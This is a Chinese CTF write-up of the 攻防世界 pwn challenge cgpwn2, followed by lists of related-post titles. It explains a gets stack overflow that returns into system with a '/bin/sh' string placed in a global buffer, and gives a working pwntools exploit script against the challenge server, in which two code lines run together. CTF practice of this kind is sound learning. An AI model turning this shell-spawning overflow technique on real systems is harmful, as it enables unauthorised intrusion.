[攻防世界 pwn]——cgpwn2

  • 题目地址: https://adworld.xctf.org.cn/
  • 题目:

    checksec一下看看, 仅仅开启了NX保护

    在IDA中 look look, 竟然发现了system函数不过参数不对

思路

先将 "/bin/sh" 写入name, 然后利用gets进行栈溢出, system作为返回值, name作为system的参数

exploit

from pwn import *
p=remote("111.200.241.244",53774)
name_addr = 0x0804A080
sys_addr = 0x0804855A
payload = 'a' * (0x26 + 0x4) + p32(sys_addr) + p32(name_addr)p.sendlineafter("please tell me your name\n", '/bin/sh')
p.sendlineafter("hello,you can leave some message here:\n",payload)
p.interactive()

[攻防世界 pwn]——cgpwn2相关推荐

  1. 【pwn】攻防世界 pwn新手区wp

    [pwn]攻防世界 pwn新手区wp 前言 这几天恶补pwn的各种知识点,然后看了看攻防世界的pwn新手区没有堆题(堆才刚刚开始看),所以就花了一晚上的时间把新手区的10题给写完了. 1.get_sh ...

  2. 攻防世界(Pwn) forgot---栈溢出;(方法二)

    攻防世界(Pwn) forgot-栈溢出:(方法一) 里面对问题描述的更详细一点 返回目标函数 0x80486CC 方法二(爆破流) 因为最终返回的是 v3[0]-v3[9] 之中的一个函数, v3[ ...

  3. 攻防世界(Pwn) forgot---栈溢出;(方法一)

    攻防世界(Pwn) forgot-栈溢出:(方法二) 介绍 这道题表面看起来有点复杂,其实很简单,有两种方法可以来做这一道题; 方法一(精确打击) 文件运行流程是: 1.先输入名字 2. 输入一串字符 ...

  4. [攻防世界 pwn]——pwn1(内涵peak小知识)

    [攻防世界 pwn]--pwn1 题目地址:https://adworld.xctf.org.cn/ 题目: peak小知识 这道题目的关键就是泄露canary,通常我们泄露canary有两种方法,遇 ...

  5. [攻防世界 pwn]——实时数据监测

    [攻防世界 pwn]--实时数据监测 题目地址:https://adworld.xctf.org.cn/ 题目: checksec就不说了,没什么 ida中 只要将key里面的值修改为35795746 ...

  6. [攻防世界 pwn]——monkey

    [攻防世界 pwn]--monkey 题目地址:https://adworld.xctf.org.cn/ 题目: 额,怎么说呢这道题.checksec没什么大不了的 但是再IDA中就懵了,好大呀.好多 ...

  7. [攻防世界 pwn]——反应釜开关控制

    [攻防世界 pwn]--反应釜开关控制 题目地址:https://adworld.xctf.org.cn/ 题目: 无言以对,直接给你shell函数,返回覆盖到shell函数就OK了 exploit ...

  8. [攻防世界 pwn]——pwn-100

    [攻防世界 pwn]--pwn-100 题目地址: https://adworld.xctf.org.cn/ 题目: checksec一下 IDA中 sub_40063D函数的作用就是读入200个字符 ...

  9. [攻防世界 pwn]——pwn-200

    [攻防世界 pwn]--pwn-200 题目地址: https://adworld.xctf.org.cn/ 题目: peak小知识 ret2libc的题型, 一般给一个输出和一个输入的函数, 输入一 ...

最新文章

  1. Facebook发布Detectron2,下一个万星目标检测新框架
  2. 设计模式(十二):通过ATM取款机来认识“状态模式”(State Pattern)
  3. idea 代码自动补全快捷键
  4. 基于MATLAB的costas载波同步+gardner时间同步,QPSK调制
  5. Java 13,最新最全新特性解读
  6. C#中全局处理异常方式
  7. HTML+CSS+Javascript教学视频【0409更新】
  8. paip.提升用户体验之全角半角
  9. 【Android】OKHTTP使用
  10. 如何计算虚拟化vcpu_【科普】CPU和内存虚拟化
  11. linux给文件夹添加查看密码是什么,Linux如何给文件夹设置密码
  12. ImageNet千分类标签翻译
  13. 大学四年,靠着这些学习网站,我从挂科学渣变成了别人眼中的大神
  14. 「股价飙到100美元我就纹身」,黄仁勋用十年站在了芯片塔尖
  15. C++switch语句详解
  16. 动态合批和静态合批的区别
  17. ubuntu安装与配置ngnix静态代理与反向代理的流程
  18. oracle存储过程语法与使用
  19. GridView 使用方法 - 前台部分
  20. 王道快速排序内容复习

热门文章

  1. java线程在什么时候结束,java – 什么时候线程超出范围?
  2. [CentOS Python系列] 四.阿里云服务器CentOS连接远程MySQL数据库及pymsql
  3. 2020年第十一届蓝桥杯 - 省赛 - C/C++研究生组 - F.成绩分析
  4. Django-RQ介绍
  5. 990. Satisfiability of Equality Equations
  6. 信息学奥赛一本通(C++)在线评测系统——基础(一)C++语言—— 1065:奇数求和
  7. 【ARM】Tiny4412裸板编程之静态库(libc.a)
  8. 【Linux】一步一步学Linux——tracepath命令(168)
  9. 【物联网】 Ubuntu中生成交叉编译器xtensa-lx106-elf
  10. [Qt教程] 第40篇 网络(十)WebKit初识